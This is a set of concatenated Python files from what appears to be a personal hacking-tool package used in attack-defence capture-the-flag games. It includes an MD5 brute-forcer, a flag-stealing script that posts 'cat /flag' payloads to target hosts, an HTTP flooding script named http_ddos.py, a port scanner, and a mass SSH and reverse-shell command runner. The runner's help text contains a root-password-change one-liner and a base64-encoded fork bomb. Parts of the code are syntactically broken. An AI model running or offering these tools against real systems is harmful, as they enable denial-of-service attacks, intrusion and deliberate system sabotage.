#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author    : HeliantHuS
# Time      : 2018/12/6


import itertools
import hashlib
import string
import requests

salt = ""   # 加盐
miwen = "a575b60c0647bd95e958f8e99e83c765"  # 需要破解的MD5!

url = "https://www.somd5.com/search.php"
data = {
    "hash": miwen,
    "captcha": 0
}

response = requests.post(url, data=data)
if response.json()['err'] != 0:
    # mode_1 = string.ascii_lowercase
    # mode_1 = string.digits
    mode_1 = string.printable

    for s in range(1, 50):
        tupleString = itertools.product(mode_1, repeat=s)
        for tupleslice in tupleString:
            tempString = "".join(tupleslice)
            xujiami = "%s%s" % (tempString, salt)

            md5Result = hashlib.md5(xujiami.encode("utf-8")).hexdigest()
            print(md5Result)
            if md5Result == miwen:
                print("明文为:" + tempString)
                break
print("明文为:" + response.json()['data'])
exit()


# Author: HeliantHuS
# IDE: VIM
# System Env: Kali Linux

import requests
import re
import threading
# submit flag address
flagServer = ""

# Flag Server Token
token = ""

# Attack Main attack function 
def Attack(target: str, payload: dict):
    try:
        data = payload
        response = requests.post(target, data=data).content.decode()
        flag = re.findall("flag{.*?}", response, re.S)
        if len(flag) > 0:
        	flag = flag[0]
        	print(f"[+]{target}: {flag}")
	        SubmitFlag(target, flag)
	    else:

    except:
        pass

# SubmitFlag emm...submit flag to flagserver
def SubmitFlag(target: str, flag: str):
    # Request Header | Add Appcation Json
    headers = {
        "Content-Type": "application/json; charset=UTF-8"
    }
    
    data = {
        "flag": flag,
        "token": token
    }

    response = requests.post(flagServer, headers=headers, data=data).json()

    # Not Use File Redirect
    print(f"{target}, {response}")

    with open("result.txt", "a+") as fp:
        fp.write(f"[+]{target}, {response} \n")

# ItemDWList | is example. 
def ItemDWList(start, end, me):
    return [f"http://127.0.0.1:1{str(i).rjust(2, '0')}80" for i in range(start, end+1) if i != me]

if __name__ == "__main__":
    # target list
    dw = []
    # dw example
    # print(ItemDWList(1, 16, 1))

    payload = {
		"test": "cat /flag"
    }
    for i in dw:
       t = threading.Thread(target=Attack, args=(i, payload))
       t.start()
    t.join()



#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = "HeliantHuS"
__version__ = "1.0"
"""
@ Author: HeliantHuS
@ Codes are far away from bugs with the animal protecting
@ Time:  2019/7/18
@ FileName: http_ddos.py
"""
import requests
import threading

status = {"200": 0, "404": 0, "500": 0}
is_exit = False
class HttpRequest(threading.Thread):
    def __init__(self, url, port=80) -> None:
        super().__init__()
        global status
        self.url = url
        self.port = port


    def run(self) -> None:
        global status
        while True:
            try:
                response = requests.get(f"{self.url}:{self.port}", timeout=3).status_code
                status[str(response)] += 1
                print(status)
            except:
                pass

if __name__ == '__main__':
    for i in range(8000):
        t = HttpRequest("http://192.168.1.80/")
        t.start()




#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = "HeliantHuS"
__version__ = "1.0"
"""
@ Author: HeliantHuS
@ Codes are far away from bugs with the animal protecting
@ Time:  2019/7/13
@ FileName: port_scanner.py
"""
import sys
import queue
import socket
import threading

q = queue.Queue()

class PortScanner(threading.Thread):
    def __init__(self, host):
        super().__init__()
        self.host: str = host

    def run(self) -> None:
        while True:
            port = q.get()
            self.scanner(port)
            q.task_done()

    def scanner(self, port):
        conn = socket.socket()
        try:
            conn.connect((self.host, port))
            print(f"[+] {port} is Open")

        except:
            pass


if __name__ == '__main__':
    # ...py www.baidu.com 1 1000 200       扫描baidu, 从1端口到1000端口 启动200个线程
    host = sys.argv[1]
    ip = socket.gethostbyname(host)
    startPort = sys.argv[2]
    endPort = sys.argv[3]
    threadNum = sys.argv[4]

    for i in range(int(threadNum)):
        t = PortScanner(ip)
        t.setDaemon(True)
        t.start()

    for i in range(int(startPort), int(endPort)):
        q.put(i)

    q.join()


#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = "HeliantHuS"
__version__ = "1.0"
"""
@ Author: HeliantHuS
@ Codes are far away from bugs with the animal protecting
@ Time:  9/28/2019
@ FileName: AWD-Tools.py
"""

import socket
import sys
import threading
import warnings

try:
    import paramiko
except ImportError:
    print("你没有安装paramiko, 使用`pip install paramiko`安装完再运行我吧~")
    input("Enter Any Key as Exit")
    exit()

warnings.filterwarnings(action='ignore', module='.*paramiko.*')

hosts = ""
username = ""
password = ""
shells = []
banner = """
 _   _      _ _             _   _   _       ____  
| | | | ___| (_) __ _ _ __ | |_| | | |_   _/ ___| 
| |_| |/ _ \ | |/ _` | '_ \| __| |_| | | | \___ \ 
|  _  |  __/ | | (_| | | | | |_|  _  | |_| |___) |
|_| |_|\___|_|_|\__,_|_| |_|\__|_| |_|\__,_|____/   --- AWD-Tools
                                                     
"""
print(banner)

# connect ssh连接并执行一条命令
def connect(host: str, username: str, password: str, port: int, command: str):
    try:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname=host, port=port, username=username, password=password, timeout=3)
        stdin, stdout, stderr = client.exec_command(command)
        print(f"[+]由{host}返回的消息:")
        for i in stdout.readlines():
            print(i.strip())

    except socket.timeout as e:
        print(f"[-]{host}已离线.")

    except paramiko.ssh_exception.AuthenticationException as e:
        print(f"[-]{host}验证失败.")

    finally:
        client.close()


# lconnect ssh连接连续执行多条命令
def lconnect(host: str, username: str, password: str, port: int, commands: list):
    try:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname=host, port=port, username=username, password=password, timeout=3)
        print(f"[+]由{host}返回的消息:")
        for command in commands:
            stdin, stdout, stderr = client.exec_command(command)
            for i in stdout.readlines():
                print(i.strip())

    except socket.timeout as e:
        print(f"[-]{host}已离线.")

    except paramiko.ssh_exception.AuthenticationException as e:
        print(f"[-]{host}登录失败.")

    finally:
        client.close()


# netCat 目标机器存在反射shell即可使用
def netCat(host: str, port: int, command: str, bytesNum=1024):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(command.encode() + b"\n")
        print(f"[+]{host}响应为:")
        print(s.recv(bytesNum).decode())
    except TimeoutError:
        print(f"[-]{host}连接超时.")
    except:
        print(f"[-]{host}未知错误.")
    finally:
        s.close()

# splitIPaddress 按照格式生成单个ip
def splitIPaddress(ip: str):
    if len(ip.split("-")) <= 1:
        return ip.split("-")
    ipResource = ".".join(ip.split("-")[0].split(".")[0:3])  # 取a.b.c
    ipStart = ip.split("-")[0].split(".")[3]  # 取d的结束
    ipEnd = ip.split("-")[1]  # 取d的开始
    return [f"{ipResource}.{i}" for i in range(int(ipStart), int(ipEnd) + 1)]


# multiConnect 批量ssh
def multiConnect(hosts: str, username: str, password: str, command: str, multi: bool, port=22):
    if multi == True:
        for i in splitIPaddress(hosts):
            t = threading.Thread(target=lconnect, args=(i, username, password, port, command,))
            t.setDaemon(True)
            t.start()
        t.join()

    elif multi == False:
        for i in splitIPaddress(hosts):
            t = threading.Thread(target=connect, args=(i, username, password, port, command,))
            t.setDaemon(True)
            t.start()
        t.join()

# multiNetCat 批量nc
def multiNetCat(hosts: str, port: int, command: str, bytesNum=1024):
    for i in splitIPaddress(hosts):
        t = threading.Thread(target=netCat, args=(i, port, command, bytesNum,))
        t.setDaemon(True)
        t.start()
    t.join()


# CLI 用户交互
def CLI():
    while True:
        print("""
                提示: 多个ip批量处理请输入 "192.168.1.100-150" 单个ip "192.168.1.100"
                选择功能:
                    [1]. 批量执行单条shell命令
                    [2]. 批量执行多条shell命令
                    [3]. 批量nc
                    [4]. 提示
                    [5]. 退出
            """)
        global hosts
        global username
        global password
        global shells

        choose1 = input("[Choose] >>> ")
        if choose1 in ["1", "2", "3", "4", "5"]:
            if choose1 == "1":
                hosts = input("hosts >>> ")
                # 单
                if username == "" and password == "":
                    username = input("username >>> ")
                    password = input("password >>> ")
                else:
                    print("检测到已经输入过用户名和密码了, 已帮你自动填写.")

                shell = input("shell(默认cat /flag) >>> ")

                if shell != "":
                    multiConnect(hosts=hosts, username=username, password=password, command=shell, multi=False)
                else:
                    multiConnect(hosts=hosts, username=username, password=password, command="cat /flag", multi=False)

            elif choose1 == "2":
                hosts = input("hosts >>> ")
                # 多
                if username == "" and password == "":
                    username = input("username >>> ")
                    password = input("password >>> ")
                else:
                    print("检测到已经输入过用户名和密码了, 已帮你自动填写.")


                # 循环输入要执行的命令
                temp = 0
                while True:
                    shell = input(f" [{temp + 1}]>>> ")
                    if shell == "":
                        break
                    else:
                        shells.append(shell)
                    temp += 1

                multiConnect(hosts=hosts, username=username, password=password, command=shells, multi=True)
            elif choose1 == "3":
                hosts = input("hosts >>> ")
                port = input("port >>> ")
                shell = input("shell >>> ")
                recvNum = input("recvNum(默认1024) >>>")
                if recvNum == "":
                    multiNetCat(hosts=hosts, port=int(port), command=shell)
                else:
                    multiNetCat(hosts=hosts, port=int(port), command=shell, bytesNum=int(recvNum))


            elif choose1 == "4":
                help()

            elif choose1 == "5":
                exit()

        else:
            print("你的输入有误.")


# help 帮助
def help():
    print(f"""
    {"*" * 10}备忘录{"*" * 10}
    1. 一条命令修改root密码: 'echo helianthusAwesome | passwd --stdin root'
    2. Fork炸弹: 'echo -n "OigpIHsgOnw6JiB9Ozo=" | base64 -d > ~/fork.sh && chmod +x ~/fork.sh && bash ~/fork.sh'
    """)

if __name__ == '__main__':
    if "help" in sys.argv:
        help()
    CLI()
    input("Enter any Key as Exit!")



#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = "HeliantHuS"
__version__ = "1.0"
"""
@ Author: HeliantHuS
@ Codes are far away from bugs with the animal protecting
@ Time:  2019/7/25
@ FileName: __init__.py
"""



#!/usr/bin/env python3
# coding=utf-8
 
from setuptools import setup, find_packages
 
__author__ = 'HeliantHuS'
__date__ = '2019/12/03'
 
setup(
    name='helianthus_tools',
    version='1.7',
    description=(
        'HeliantHuS-Tools ~ wow awesome!' +
        'Change AWD plugin BUG(input host error.)'
    ),
    long_description=open('README.txt').read(),
    author='HeliantHuS',
    author_email='1984441370@qq.com',
    maintainer='HeliantHuS',
    maintainer_email='1984441370@qq.com',
    license='MIT License',
    packages=find_packages(),
    platforms=["all"],
    url='https://github.com/L-HeliantHuS/helianthus-tools',
    install_requires=['requests', 'paramiko'],
    include_package_data=True,
    classifiers=[
        'Operating System :: OS Independent',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Topic :: Software Development :: Libraries'
    ],
)